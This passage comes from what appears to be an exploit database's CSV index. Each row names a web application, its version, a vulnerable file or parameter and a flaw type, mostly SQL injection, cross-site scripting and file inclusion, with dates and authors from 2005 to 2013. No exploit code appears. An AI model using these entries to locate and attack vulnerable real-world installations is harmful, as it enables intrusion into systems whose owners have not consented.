Injection",2005-11-23,r0t3d3Vil,webapps,php, +26571,exploits/php/webapps/26571.txt,"Ezyhelpdesk 1.0 - Multiple SQL Injections",2005-11-23,r0t,webapps,php, +26572,exploits/php/webapps/26572.txt,"blogBuddies 0.3 - 'index.php?u' Cross-Site Scripting",2005-11-23,gb.network,webapps,php, +26573,exploits/php/webapps/26573.txt,"blogBuddies 0.3 - 'magpie_debug.php?url' Cross-Site Scripting",2005-11-23,gb.network,webapps,php, +26574,exploits/php/webapps/26574.txt,"blogBuddies 0.3 - 'magpie_slashbox.php?rss_url' Cross-Site Scripting",2005-11-23,gb.network,webapps,php, +26576,exploits/php/webapps/26576.txt,"FreeForum 1.0/1.1 - Multiple SQL Injections",2005-11-23,r0t3d3Vil,webapps,php, +26580,exploits/php/webapps/26580.txt,"SoftBiz Web Hosting Directory Script 1.1 - 'search_result.php?cid' SQL Injection",2005-11-24,r0t,webapps,php, +26581,exploits/php/webapps/26581.txt,"SoftBiz Web Hosting Directory Script 1.1 - 'review.php?sbres_id' SQL Injection",2005-11-24,r0t,webapps,php, +26582,exploits/php/webapps/26582.txt,"SoftBiz Web Hosting Directory Script 1.1 - 'browsecats.php?cid' SQL Injection",2005-11-24,r0t,webapps,php, +26583,exploits/php/webapps/26583.txt,"SoftBiz Web Hosting Directory Script 1.1 - 'email.php?h_id' SQL Injection",2005-11-24,r0t,webapps,php, +26584,exploits/php/webapps/26584.txt,"vTiger CRM 4.2 Leads Module - 'record' Cross-Site Scripting",2005-11-24,"Christopher Kunz",webapps,php, +26585,exploits/php/webapps/26585.txt,"vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting",2005-11-24,"Christopher Kunz",webapps,php, +26586,exploits/php/webapps/26586.txt,"vTiger CRM 4.2 - SQL Injection",2005-11-24,"Christopher Kunz",webapps,php, +26587,exploits/php/webapps/26587.txt,"Comdev Vote Caster 3.1 - 'index.php' SQL Injection",2005-11-24,r0t,webapps,php, +26588,exploits/php/webapps/26588.txt,"Orca Forum 4.3 - 'forum.php' SQL Injection",2005-11-24,r0t3d3Vil,webapps,php, +26589,exploits/php/webapps/26589.txt,"OvBB 0.x - 'thread.php?threadid' SQL Injection",2005-11-24,r0t3d3Vil,webapps,php, +26590,exploits/php/webapps/26590.txt,"OvBB 0.x - 'profile.php?userid' SQL Injection",2005-11-24,r0t3d3Vil,webapps,php, +26591,exploits/php/webapps/26591.txt,"efiction 1.0/1.1/2.0 - 'titles.php' Cross-Site Scripting",2005-11-25,retrogod@aliceposta.it,webapps,php, +26592,exploits/php/webapps/26592.txt,"efiction 1.0/1.1/2.0 - 'titles.php' SQL Injection",2005-11-25,retrogod@aliceposta.it,webapps,php, +26593,exploits/php/webapps/26593.txt,"efiction 1.0/1.1/2.0 - 'sid' SQL Injection",2005-11-25,retrogod@aliceposta.it,webapps,php, +26594,exploits/php/webapps/26594.txt,"efiction 1.0/1.1/2.0 - 'uid' SQL Injection",2005-11-25,retrogod@aliceposta.it,webapps,php, +26595,exploits/php/webapps/26595.txt,"IsolSoft Support Center 2.2 - Multiple SQL Injections",2005-11-25,r0t3d3Vil,webapps,php, +26596,exploits/php/webapps/26596.txt,"AgileBill 1.4.92 - Product_Cat SQL Injection",2005-11-25,r0t,webapps,php, +26597,exploits/php/webapps/26597.txt,"PBLang Bulletin Board System 4.65 - Multiple HTML Injection Vulnerabilities",2005-11-26,r0xes,webapps,php, +26598,exploits/php/webapps/26598.txt,"Athena PHP Website Administration 0.1 - Remote File Inclusion",2005-11-26,[GB],webapps,php, +26599,exploits/php/webapps/26599.txt,"PHPGreetz 0.99 - Remote File Inclusion",2005-11-26,[GB],webapps,php, +26600,exploits/php/webapps/26600.txt,"Q-News 2.0 - Remote File Inclusion",2005-11-26,[GB],webapps,php, +26602,exploits/php/webapps/26602.txt,"Enterprise Heart Enterprise Connector 1.0.2 - 'send.php?messageid' SQL Injection",2005-11-28,r0t,webapps,php, +26603,exploits/php/webapps/26603.txt,"Enterprise Heart Enterprise Connector 1.0.2 - 'messages.php?messageid' SQL Injection",2005-11-28,r0t,webapps,php, +26604,exploits/php/webapps/26604.txt,"Zainu 2.0 - SQL Injection",2005-11-28,r0t,webapps,php, +26605,exploits/php/webapps/26605.txt,"Babe Logger 2.0 - 'index.php?gal' SQL Injection",2005-11-28,r0t,webapps,php, +26606,exploits/php/webapps/26606.txt,"Babe Logger 2.0 - 'comments.php?id' SQL Injection",2005-11-28,r0t,webapps,php, +26607,exploits/php/webapps/26607.txt,"Top Music Module 3.0 - SQL Injection",2005-11-28,r0t,webapps,php, +26608,exploits/php/webapps/26608.txt,"phpWordPress 3.0 - Multiple SQL Injections",2005-11-28,r0t,webapps,php, +26609,exploits/php/webapps/26609.txt,"Bedeng PSP 1.1 - 'baca.php?ckode' SQL Injection",2005-11-28,r0t,webapps,php, +26610,exploits/php/webapps/26610.txt,"Bedeng PSP 1.1 - 'download.php?a.ngroup' SQL Injection",2005-11-28,r0t,webapps,php, +26611,exploits/php/webapps/26611.txt,"Bedeng PSP 1.1 - 'index.php?a.nsub' SQL Injection",2005-11-28,r0t,webapps,php, +26612,exploits/php/webapps/26612.txt,"Nelogic Nephp Publisher 4.5.2 - SQL Injection",2005-11-28,r0t,webapps,php, +26613,exploits/php/webapps/26613.txt,"Softbiz Resource Repository Script - 'details_res.php?sbres_id' SQL Injection",2005-11-28,r0t,webapps,php, +26614,exploits/php/webapps/26614.txt,"Softbiz Resource Repository Script - 'showcats.php?sbcat_id' SQL Injection",2005-11-28,r0t,webapps,php, +26615,exploits/php/webapps/26615.txt,"Softbiz Resource Repository Script - 'refer_friend.php?sbres_id' SQL Injection",2005-11-28,r0t,webapps,php, +26616,exploits/php/webapps/26616.txt,"Softbiz Resource Repository Script - 'report_link.php?sbres_id' SQL Injection",2005-11-28,r0t,webapps,php, +26617,exploits/php/webapps/26617.txt,"BerliOS SourceWell 1.1.3 - SQL Injection",2005-11-28,r0t,webapps,php, +26618,exploits/php/webapps/26618.txt,"AllWeb Search 3.0 - SQL Injection",2005-11-28,r0t,webapps,php, +26619,exploits/php/webapps/26619.txt,"K-Search 1.0 - SQL Injection",2005-11-28,r0t,webapps,php, +26621,exploits/multiple/webapps/26621.txt,"Mobile Atlas Creator 1.9.12 - Persistent Command Injection",2013-07-05,Vulnerability-Lab,webapps,multiple, +26623,exploits/php/webapps/26623.txt,"Kasseler CMS 2 r1223 - Multiple Vulnerabilities",2013-07-05,"High-Tech Bridge SA",webapps,php, +26624,exploits/php/webapps/26624.txt,"OpenX 2.8.10 - Multiple Vulnerabilities",2013-07-05,"High-Tech Bridge SA",webapps,php, +26625,exploits/php/webapps/26625.txt,"EdmoBBS 0.9 - SQL Injection",2005-11-28,r0t,webapps,php, +26626,exploits/php/webapps/26626.txt,"UGroup 2.6.2 - 'forum.php?FORUM_ID' SQL Injection",2005-11-28,r0t,webapps,php, +26627,exploits/php/webapps/26627.txt,"UGroup 2.6.2 - 'topic.php' Multiple SQL Injections",2005-11-28,r0t,webapps,php, +26628,exploits/php/webapps/26628.txt,"ShockBoard 3.0/4.0 - 'Offset' SQL Injection",2005-11-28,r0t,webapps,php, +26629,exploits/php/webapps/26629.txt,"Netzbrett 1.5.1 - 'P_Entry' SQL Injection",2005-11-28,r0t,webapps,php, +26630,exploits/php/webapps/26630.txt,"ADC2000 NG Pro 1.2 - SQL Injection",2005-11-28,r0t,webapps,php, +26631,exploits/php/webapps/26631.txt,"Simple Document Management System 2.0 - 'list.php?folder_id' SQL Injection",2005-11-28,r0t,webapps,php, +26632,exploits/php/webapps/26632.txt,"Simple Document Management System 2.0 - 'messages.php?mid' SQL Injection",2005-11-28,r0t,webapps,php, +26633,exploits/php/webapps/26633.txt,"PDJK-support Suite 1.1 - Multiple SQL Injections",2005-11-28,r0t,webapps,php, +26634,exploits/php/webapps/26634.txt,"Randshop - Multiple SQL Injections",2005-11-28,liz0,webapps,php, +26635,exploits/php/webapps/26635.txt,"FreeWebStat 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-11-28,"Francesco Ongaro",webapps,php, +26636,exploits/php/webapps/26636.txt,"PHP Web Statistik 1.4 - Content Injection",2005-11-28,"Francesco Ongaro",webapps,php, +26637,exploits/php/webapps/26637.txt,"Helpdesk Issue Manager 0.x - 'issue.php?id' SQL Injection",2005-11-28,r0t3d3Vil,webapps,php, +26638,exploits/php/webapps/26638.txt,"Helpdesk Issue Manager 0.x - 'find.php' Multiple SQL Injections",2005-11-28,r0t3d3Vil,webapps,php, +26639,exploits/php/webapps/26639.txt,"GuppY 4.5 - 'editorTypetool.php?meskin' Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,webapps,php, +26640,exploits/php/webapps/26640.txt,"GuppY 4.5 - 'archbatch.php?lng' Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,webapps,php, +26641,exploits/php/webapps/26641.txt,"GuppY 4.5 - 'dbbatch.php?lng' Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,webapps,php, +26642,exploits/php/webapps/26642.txt,"GuppY 4.5 - 'nwlmail.php?lng' Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,webapps,php, +26643,exploits/php/webapps/26643.txt,"PHP Doc System 1.5.1 - Local File Inclusion",2005-11-28,r0t,webapps,php, +26644,exploits/php/webapps/26644.txt,"SearchSolutions 1.2/1.3 (Multiple Products) - Cross-Site Scripting",2005-11-28,r0t,webapps,php, +26645,exploits/php/webapps/26645.txt,"ASP-Rider 1.6 - 'default.asp' SQL Injection",2005-11-29,info@hoder.com,webapps,php, +26646,exploits/php/webapps/26646.txt,"PHP Upload Center - 'index.php' Directory Traversal",2005-11-29,liz0,webapps,php, +26647,exploits/php/webapps/26647.txt,"Fantastic Scripts Fantastic News 2.1.1 - 'news.php' SQL Injection",2005-11-29,r0t3d3Vil,webapps,php, +26649,exploits/php/webapps/26649.txt,"DMANews 0.9 - Multiple SQL Injections",2005-11-29,r0t,webapps,php, +26650,exploits/php/webapps/26650.txt,"Entergal MX 2.0 - Multiple SQL Injections",2005-11-29,r0t,webapps,php, +26651,exploits/php/webapps/26651.txt,"BosDates 4.0 - Multiple SQL Injections",2005-11-29,r0t,webapps,php, +26652,exploits/php/webapps/26652.txt,"Post Affiliate Pro 2.0.4 - 'index.php' SQL Injection",2005-11-29,r0t,webapps,php, +26653,exploits/php/webapps/26653.txt,"GhostScripter Amazon Shop 5.0 - 'search.php' SQL Injection",2005-11-29,r0t,webapps,php, +26654,exploits/php/webapps/26654.txt,"KBase Express 1.0 - Multiple SQL Injections",2005-11-29,r0t,webapps,php, +26655,exploits/php/webapps/26655.txt,"ltwCalendar 4.1.3 - 'calendar.php' SQL Injection",2005-11-29,r0t,webapps,php, +26656,exploits/php/webapps/26656.txt,"Orca KnowledgeBase 2.1 - 'KnowledgeBase.php' SQL Injection",2005-11-29,r0t,webapps,php, +26657,exploits/php/webapps/26657.txt,"Orca Blog 1.3 - 'blog.php' SQL Injection",2005-11-29,r0t,webapps,php, +26658,exploits/php/webapps/26658.txt,"Orca Ringmaker 2.3 - 'Ringmaker.php' SQL Injection",2005-11-29,r0t,webapps,php, +26659,exploits/php/webapps/26659.txt,"FAQ System 1.1 - 'viewFAQ.php' Multiple SQL Injections",2005-11-29,r0t,webapps,php, +26660,exploits/php/webapps/26660.txt,"FAQ System 1.1 - 'index.php?category_id' SQL Injection",2005-11-29,r0t,webapps,php, +26661,exploits/php/webapps/26661.txt,"Survey System 1.1 - 'survey.php' SQL Injection",2005-11-29,r0t,webapps,php, +26662,exploits/php/webapps/26662.php,"N-13 News 1.2 - SQL Injection",2005-11-29,KingOfSka,webapps,php, +26663,exploits/php/webapps/26663.txt,"DRZES Hms 3.2 - Multiple SQL Injections",2005-11-29,r0t,webapps,php, +26664,exploits/hardware/webapps/26664.txt,"D-Link - OS-Command Injection via UPnP Interface",2013-07-07,m-1-k-3,webapps,hardware, +26667,exploits/php/webapps/26667.txt,"SocketKB 1.1 - 'index.php' SQL Injection",2005-11-30,r0t,webapps,php, +26668,exploits/php/webapps/26668.txt,"PHP Photo Album 0.2.3/4.1 - Local File Inclusion",2005-11-30,r0t3d3Vil,webapps,php, +26669,exploits/php/webapps/26669.txt,"SoftBiz B2B trading Marketplace Script 1.1 - 'selloffers.php?cid' SQL Injection",2005-11-30,r0t,webapps,php, +26670,exploits/php/webapps/26670.txt,"SoftBiz B2B trading Marketplace Script 1.1 - 'buyoffers.php?cid' SQL Injection",2005-11-30,r0t,webapps,php, +26671,exploits/php/webapps/26671.txt,"SoftBiz B2B trading Marketplace Script 1.1 - 'products.php?cid' SQL Injection",2005-11-30,r0t,webapps,php, +26672,exploits/php/webapps/26672.txt,"SoftBiz B2B trading Marketplace Script 1.1 - 'profiles.php?cid' SQL Injection",2005-11-30,r0t,webapps,php, +26673,exploits/php/webapps/26673.txt,"SoftBiz FAQ 1.1 - 'index.php?cid' SQL Injection",2005-11-30,r0t,webapps,php, +26674,exploits/php/webapps/26674.txt,"SoftBiz FAQ 1.1 - 'faq_qanda.php?id' SQL Injection",2005-11-30,r0t,webapps,php, +26675,exploits/php/webapps/26675.txt,"SoftBiz FAQ 1.1 - 'refer_friend.php?id' SQL Injection",2005-11-30,r0t,webapps,php, +26676,exploits/php/webapps/26676.txt,"SoftBiz FAQ 1.1 - 'print_article.php?id' SQL Injection",2005-11-30,r0t,webapps,php, +26677,exploits/php/webapps/26677.txt,"SoftBiz FAQ 1.1 - 'add_comment.php?id' SQL Injection",2005-11-30,r0t,webapps,php, +26678,exploits/php/webapps/26678.txt,"FAQRing 3.0 - 'answer.php' SQL Injection",2005-11-30,r0t,webapps,php, +26679,exploits/php/webapps/26679.txt,"WSN Knowledge Base 1.2 - 'index.php' Multiple SQL Injections",2005-11-30,r0t,webapps,php, +26680,exploits/php/webapps/26680.txt,"WSN Knowledge Base 1.2 - 'comments.php?id' SQL Injection",2005-11-30,r0t,webapps,php, +26681,exploits/php/webapps/26681.txt,"WSN Knowledge Base 1.2 - 'memberlist.php?id' SQL Injection",2005-11-30,r0t,webapps,php, +26682,exploits/php/webapps/26682.txt,"OpenNetAdmin 13.03.01 - Remote Code Execution",2013-07-07,Mandat0ry,webapps,php, +26683,exploits/php/webapps/26683.txt,"O-Kiraku Nikki 1.3 - 'Nikki.php' SQL Injection",2005-11-30,r0t,webapps,php, +26684,exploits/php/webapps/26684.txt,"88Scripts Event Calendar 2.0 - 'index.php' SQL Injection",2005-11-30,r0t,webapps,php, +26685,exploits/php/webapps/26685.txt,"Instant Photo Gallery 1.0 - 'portfolio.php?cat_id' SQL Injection",2005-11-30,r0t,webapps,php, +26686,exploits/php/webapps/26686.txt,"Instant Photo Gallery 1.0 - 'content.php?cid' SQL Injection",2005-11-30,r0t,webapps,php, +26687,exploits/php/webapps/26687.txt,"WebCalendar 1.0.1 - Multiple SQL Injections",2005-12-01,lwang,webapps,php, +26688,exploits/php/webapps/26688.php,"Lore 1.5.4/1.5.6 - 'article.php' SQL Injection",2005-12-01,r0t,webapps,php, +26689,exploits/php/webapps/26689.txt,"DotClear 1.2.1/1.2.2 - 'Session.php' SQL Injection",2005-12-01,Siegfried,webapps,php, +26691,exploits/php/webapps/26691.txt,"WebCalendar 1.0.1 - 'Layers_Toggle.php' HTTP Response Splitting",2005-12-01,lwang,webapps,php, +26692,exploits/php/webapps/26692.txt,"Extreme Corporate 6.0 - 'Extremesearch.php' Cross-Site Scripting",2005-12-01,r0t,webapps,php, +26693,exploits/php/webapps/26693.txt,"Edgewall Software Trac 0.9 Ticket Query Module - SQL Injection",2005-12-01,"David Maciejak",webapps,php, +26694,exploits/php/webapps/26694.txt,"PHPMyChat 0.14.6 - 'start_page.css.php?medium' Cross-Site Scripting",2005-12-01,"Louis Wang",webapps,php, +26695,exploits/php/webapps/26695.txt,"PHPMyChat 0.14.6 - 'style.css.php?medium' Cross-Site Scripting",2005-12-01,"Louis Wang",webapps,php, +26696,exploits/php/webapps/26696.txt,"PHPMyChat 0.14.6 - 'users_popupL.php?From' Cross-Site Scripting",2005-12-01,"Louis Wang",webapps,php, +26697,exploits/php/webapps/26697.php,"PHPX 3.5.x - 'Admin 'login.php' SQL Injection",2005-11-30,rgod,webapps,php, +26698,exploits/php/webapps/26698.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 - 'gallery.php?CatID' SQL Injection",2005-12-02,r0t,webapps,php, +26699,exploits/php/webapps/26699.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 - 'ViewItem.php?ItemNum' SQL Injection",2005-12-02,r0t,webapps,php, +26700,exploits/jsp/webapps/26700.txt,"Java Search Engine 0.9.34 - search.jsp Cross-Site Scripting",2005-12-02,r0t,webapps,jsp, +26701,exploits/asp/webapps/26701.txt,"ASPS Shopping Cart Lite 2.1/Professional 2.9 d - 'adv_search.asp?srch_product_name' Cross-Site Scripting",2005-12-03,r0t3d3Vil,webapps,asp, +26702,exploits/asp/webapps/26702.txt,"ASPS Shopping Cart Lite 2.1/Professional 2.9 d - 'bsearch.asp?b_search' Cross-Site Scripting",2005-12-03,r0t3d3Vil,webapps,asp, +26704,exploits/asp/webapps/26704.txt,"Solupress News 1.0 - 'search.asp' Cross-Site Scripting",2005-12-03,r0t3d3Vil,webapps,asp, +26705,exploits/asp/webapps/26705.txt,"SiteBeater News 4.0 - 'Archive.asp' Cross-Site Scripting",2005-12-03,r0t3d3Vil,webapps,asp, +26706,exploits/php/webapps/26706.txt,"PHP-Fusion 6.0.109 - 'messages.php' SQL Injection",2005-12-03,"Nolan West",webapps,php, +26707,exploits/php/webapps/26707.txt,"Alisveristr E-Commerce Login - Multiple SQL Injections",2005-12-03,B3g0k,webapps,php, +26713,exploits/php/webapps/26713.txt,"PHPYellowTM 5.33 - 'search_result.php?haystack' SQL Injection",2005-12-03,r0t3d3Vil,webapps,php, +26714,exploits/php/webapps/26714.txt,"PHPYellowTM 5.33 - 'print_me.php?ckey' SQL Injection",2005-12-03,r0t3d3Vil,webapps,php, +26715,exploits/php/webapps/26715.txt,"Widget Property 1.1.19 - 'Property.php' SQL Injection",2005-11-05,r0t3d3Vil,webapps,php, +26716,exploits/cgi/webapps/26716.txt,"Easy Search System 1.1 - 'search.cgi' Cross-Site Scripting",2005-12-05,r0t,webapps,cgi, +26717,exploits/php/webapps/26717.txt,"Web4Future eCommerce Enterprise Edition 2.1 - 'view.php' Multiple SQL Injections",2005-12-05,r0t3d3Vil,webapps,php, +26718,exploits/php/webapps/26718.txt,"Web4Future eCommerce Enterprise Edition 2.1 - 'index.php' Multiple SQL Injections",2005-12-05,r0t3d3Vil,webapps,php, +26719,exploits/php/webapps/26719.txt,"Web4Future eCommerce Enterprise Edition 2.1 - 'viewbrands.php?bid' SQL Injection",2005-12-05,r0t3d3Vil,webapps,php, +26720,exploits/php/webapps/26720.txt,"SAMEDIA LandShop 0.6.3 - 'ls.php' Multiple SQL Injections",2005-12-05,r0t3d3Vil,webapps,php, +26721,exploits/cgi/webapps/26721.txt,"1-Script 1-Search 1.8 - '1search.CGI' Cross-Site Scripting",2005-12-05,r0t,webapps,cgi, +26722,exploits/php/webapps/26722.txt,"Hobosworld HobSR - Multiple SQL Injections",2005-12-05,r0t3d3Vil,webapps,php, +26723,exploits/php/webapps/26723.txt,"Relative Real Estate Systems 1.2 - SQL Injection",2005-12-05,r0t3d3Vil,webapps,php, +26724,exploits/php/webapps/26724.txt,"Web4Future eDating Professional 5.0 - 'index.php' Multiple SQL Injections",2005-12-05,r0t,webapps,php, +26725,exploits/php/webapps/26725.txt,"Web4Future eDating Professional 5.0 - 'gift.php?cid' SQL Injection",2005-12-05,r0t,webapps,php, +26726,exploits/php/webapps/26726.txt,"Web4Future eDating Professional 5.0 - 'articles.php?cat' SQL Injection",2005-12-05,r0t,webapps,php, +26727,exploits/php/webapps/26727.txt,"Web4Future eDating Professional 5.0 - 'fq.php?cid' SQL Injection",2005-12-05,r0t,webapps,php, +26728,exploits/php/webapps/26728.txt,"Web4Future Portal Solutions - 'Comentarii.php' SQL Injection",2005-12-05,r0t,webapps,php, +26729,exploits/php/webapps/26729.txt,"Web4Future Affiliate Manager PRO 4.1 - 'functions.php' SQL Injection",2005-12-05,r0t,webapps,php, +26730,exploits/php/webapps/26730.txt,"Web4Future Portal Solutions - 'Arhiva.php' Directory Traversal",2005-12-05,r0t,webapps,php, +26731,exploits/php/webapps/26731.txt,"Blog System 1.2 - 'index.php?cat' SQL Injection",2005-12-05,r0t3d3Vil,webapps,php, +26732,exploits/php/webapps/26732.txt,"Edgewall Software Trac 0.7.1/0.8/0.9 Search Module - SQL Injection",2005-12-05,anonymous,webapps,php, +26734,exploits/php/webapps/26734.txt,"vBulletin Advanced User Tagging Mod - Persistent Cross-Site Scripting",2013-07-10,[]0iZy5,webapps,php, +26735,exploits/php/webapps/26735.txt,"vBulletin vBShout Mod - Persistent Cross-Site Scripting",2013-07-10,[]0iZy5,webapps,php, +26736,exploits/hardware/webapps/26736.txt,"Zoom Telephonics X4/X5 ADSL Modem - Multiple Vulnerabilities",2013-07-10,"Kyle Lovett",webapps,hardware, +27634,exploits/php/webapps/27634.txt,"PatroNet CMS - 'index.php' Cross-Site Scripting",2006-04-12,Soothackers,webapps,php, +26742,exploits/asp/webapps/26742.txt,"DuWare DuPortalPro 3.4.3 - 'Password.asp' Cross-Site Scripting",2005-12-06,Dj_Eyes,webapps,asp, +26743,exploits/asp/webapps/26743.txt,"IISWorks ASPKnowledgeBase 2.0 - 'KB.asp' Cross-Site Scripting",2005-12-06,r0t,webapps,asp, +26744,exploits/asp/webapps/26744.txt,"NetAuctionHelp 3.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-06,r0t,webapps,asp, +26745,exploits/asp/webapps/26745.txt,"RWAuction Pro 4.0 - 'search.asp' Cross-Site Scripting",2005-12-06,r0t,webapps,asp, +26746,exploits/asp/webapps/26746.txt,"A-FAQ 1.0 - 'faqDspItem.asp?faqid' SQL Injection",2005-12-06,r0t,webapps,asp, +26747,exploits/asp/webapps/26747.txt,"A-FAQ 1.0 - 'faqDsp.asp?catcode' SQL Injection",2005-12-06,r0t,webapps,asp, +26748,exploits/php/webapps/26748.txt,"DoceboLms 2.0.x - 'connector.php' Directory Traversal",2005-12-06,rgod,webapps,php, +26750,exploits/php/webapps/26750.txt,"PluggedOut Blog 1.9.x - 'index.php' Multiple SQL Injections",2005-12-06,r0t,webapps,php, +26751,exploits/php/webapps/26751.txt,"Cars Portal 1.1 - 'index.php' Multiple SQL Injections",2005-12-06,r0t,webapps,php, +26755,exploits/php/webapps/26755.txt,"Thwboard Beta 2.8 - 'calendar.php?year' SQL Injection",2005-12-07,trueend5,webapps,php, +26756,exploits/php/webapps/26756.txt,"Thwboard Beta 2.8 - 'v_profile.php?user' SQL Injection",2005-12-07,trueend5,webapps,php, +26757,exploits/php/webapps/26757.txt,"Thwboard Beta 2.8 - 'misc.php?userid' SQL Injection",2005-12-07,trueend5,webapps,php, +26758,exploits/php/webapps/26758.txt,"DRZES Hms 3.2 - 'login.php' Cross-Site Scripting",2005-12-07,Vipsta,webapps,php, +26759,exploits/asp/webapps/26759.txt,"ASPMForum - 'forum.asp?baslik' SQL Injection",2005-12-07,dj_eyes2005,webapps,asp, +26760,exploits/asp/webapps/26760.txt,"ASPMForum - 'kullanicilistesi.asp?harf' SQL Injection",2005-12-07,dj_eyes2005,webapps,asp, +26761,exploits/cgi/webapps/26761.txt,"Dell TrueMobile 2300 - Remote Credential Reset",2005-12-07,TNull,webapps,cgi, +26763,exploits/cfm/webapps/26763.txt,"Magic List Pro - 'view_archive.cfm?ListID' SQL Injection",2005-12-08,r0t,webapps,cfm, +26764,exploits/cfm/webapps/26764.txt,"Magic Forum Personal - 'view_forum.cfm?ForumID' SQL Injection",2005-12-08,r0t,webapps,cfm, +26765,exploits/cfm/webapps/26765.txt,"Magic Forum Personal - 'view_thread.cfm' Multiple SQL Injections",2005-12-08,r0t,webapps,cfm, +26766,exploits/cfm/webapps/26766.txt,"CF_Nuke 4.6 - 'index.cfm' Local File Inclusion",2005-12-08,r0t,webapps,cfm, +26767,exploits/cfm/webapps/26767.txt,"CF_Nuke 4.6 - 'index.cfm' Cross-Site Scripting",2005-12-08,r0t,webapps,cfm, +26770,exploits/php/webapps/26770.txt,"MilliScripts 1.4 - 'register.php' Cross-Site Scripting",2005-12-08,"Security Nation",webapps,php, +26771,exploits/cgi/webapps/26771.txt,"Nortel SSL VPN 4.2.1.6 - Web Interface Input Validation",2005-12-08,"Daniel Fabian",webapps,cgi, +26772,exploits/cfm/webapps/26772.txt,"Magic Book Professional 2.0 - 'Book.cfm' Cross-Site Scripting",2005-12-12,r0t,webapps,cfm, +26777,exploits/asp/webapps/26777.txt,"LocazoList Classifieds 1.0 - 'SearchDB.asp' Input Validation",2005-12-12,r0t3d3Vil,webapps,asp, +26778,exploits/jsp/webapps/26778.txt,"BlackBoard Academic Suite 6.2.3.23 - Frameset.jsp Cross-Domain Frameset Loading",2005-12-12,dr_insane,webapps,jsp, +26780,exploits/php/webapps/26780.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-QuickSearch.php' Cross-Site Scripting",2005-12-12,Preddy,webapps,php, +26781,exploits/php/webapps/26781.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-BrowseResources.php' Cross-Site Scripting",2005-12-12,Preddy,webapps,php, +26782,exploits/php/webapps/26782.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-AdvancedSearch.php' Cross-Site Scripting",2005-12-12,Preddy,webapps,php, +26783,exploits/php/webapps/26783.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-UserLogin.php' SQL Injection",2005-12-12,Preddy,webapps,php, +26784,exploits/php/webapps/26784.txt,"BTGrup Admin WebController - SQL Injection",2005-12-12,khc@bsdmail.org,webapps,php, +26785,exploits/php/webapps/26785.txt,"Arab Portal 2.0 - 'Link.php' SQL Injection",2005-12-12,stranger-killer,webapps,php, +26786,exploits/cgi/webapps/26786.txt,"EveryAuction 1.53 - Auction.pl Cross-Site Scripting",2005-12-13,$um$id,webapps,cgi, +26787,exploits/php/webapps/26787.txt,"phpCOIN 1.2.2 - CCFG[_PKG_PATH_DBSE] Remote File Inclusion",2005-12-13,retrogod@aliceposta.it,webapps,php, +26788,exploits/php/webapps/26788.txt,"PHPCOIN 1.2.2 - '/includes/db.php?$_CCFG[_PKG_PATH_DBSE]' Traversal Arbitrary File Access",2005-12-13,retrogod@aliceposta.it,webapps,php, +26789,exploits/php/webapps/26789.txt,"EncapsGallery 1.0 - 'gallery.php' SQL Injection",2005-12-13,r0t3d3Vil,webapps,php, +26790,exploits/php/webapps/26790.txt,"PHPWebGallery 1.3.4/1.5.1 - 'comments.php' SQL Injection",2005-12-13,r0t3d3Vil,webapps,php, +26791,exploits/php/webapps/26791.txt,"PHPWebGallery 1.3.4/1.5.1 - 'category.php' SQL Injection",2005-12-13,r0t3d3Vil,webapps,php, +26792,exploits/php/webapps/26792.txt,"PHPWebGallery 1.3.4/1.5.1 - 'picture.php' SQL Injection",2005-12-13,r0t3d3Vil,webapps,php, +26793,exploits/php/webapps/26793.txt,"Plogger Beta 2 - 'index.php?id' SQL Injection",2005-12-13,r0t,webapps,php, +26794,exploits/php/webapps/26794.txt,"Plogger Beta 2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-13,r0t,webapps,php, +26795,exploits/php/webapps/26795.txt,"VCD-db 0.9x - 'search.php?by' SQL Injection",2005-12-13,r0t3d3Vil,webapps,php, +26796,exploits/php/webapps/26796.txt,"VCD-db 0.9x Search Module - 'batch' Cross-Site Scripting",2005-12-13,r0t3d3Vil,webapps,php, +26797,exploits/php/webapps/26797.txt,"PHP JackKnife 2.21 - Cross-Site Scripting",2005-12-13,r0t3d3Vil,webapps,php, +26798,exploits/php/webapps/26798.txt,"Mantis 0.x/1.0 - 'View_filters_page.php' Cross-Site Scripting",2005-12-13,r0t,webapps,php, +26799,exploits/php/webapps/26799.txt,"Snipe Gallery 3.1.4 - 'view.php?gallery_id' SQL Injection",2005-12-13,r0t,webapps,php, +26800,exploits/php/webapps/26800.txt,"Snipe Gallery 3.1.4 - 'image.php?image_id' SQL Injection",2005-12-13,r0t,webapps,php, +26801,exploits/php/webapps/26801.txt,"Snipe Gallery 3.1.4 - 'search.php?keyword' Cross-Site Scripting",2005-12-13,r0t,webapps,php, +27438,exploits/php/webapps/27438.txt,"Invision Power Services Invision Board 2.0.4 - Calendar Action Multiple Cross-Site Scripting Vulnerabilities",2006-03-17,Mr.SNAKE,webapps,php, +26804,exploits/php/webapps/26804.txt,"WordPress Plugin Spicy Blogroll - Local File Inclusion",2013-07-13,Ahlspiess,webapps,php, +26806,exploits/asp/webapps/26806.txt,"BMC Service Desk Express 10.2.1.95 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",webapps,asp, +26807,exploits/windows/webapps/26807.txt,"McAfee ePO 4.6.6 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",webapps,windows, +26808,exploits/php/webapps/26808.txt,"McGallery 1.0/1.1/2.2 - 'index.php?language' Traversal Local File Inclusion",2005-12-13,r0t,webapps,php, +26809,exploits/php/webapps/26809.txt,"McGallery 1.0/1.1/2.2 - 'show.php' Multiple SQL Injections",2005-12-13,r0t,webapps,php, +26810,exploits/php/webapps/26810.txt,"McGallery 1.0/1.1/2.2 - 'index.php?album' SQL Injection",2005-12-13,r0t,webapps,php, +26812,exploits/php/webapps/26812.txt,"PHP Web Scripts Ad Manager Pro 2.0 - 'Advertiser_statistic.php' SQL Injection",2005-12-14,r0t3d3Vil,webapps,php, 